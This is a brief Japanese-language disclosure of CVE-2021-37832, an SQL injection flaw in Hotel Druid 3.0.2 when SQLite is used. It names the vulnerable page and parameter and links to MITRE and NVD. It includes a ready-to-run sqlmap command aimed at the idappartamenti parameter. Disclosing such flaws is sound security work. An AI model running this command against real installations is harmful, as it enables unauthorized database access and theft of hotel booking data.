
CVE-2021-37832 - Hotel Druid 3.0.2 SQLインジェクションの脆弱性 - 9.8 CVSS 3.1
Hotel Druid 3.0.2において、アプリケーションデータベースとしてSQLiteが使用されている場合、SQLインジェクションの脆弱性が存在します。悪意のある攻撃者は、脆弱なidappartamentiパラメータを介してSQLiteデータベースにSQLコマンドを発行することができます。
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37832
https://nvd.nist.gov/vuln/detail/CVE-2021-37832#match-6858716
脆弱なPHPページ:
modifica_app.php - idappartamenti パラメータ
脆弱なペイロード
sqlmap -u "/modifica_app.php?tipo_tabella=appartamenti&anno=2021&id_sessione=&idappartamenti=01" --level=3 --risk=2 --banner --dbms=sqlite
発見者: Joe Helle, 2021年7月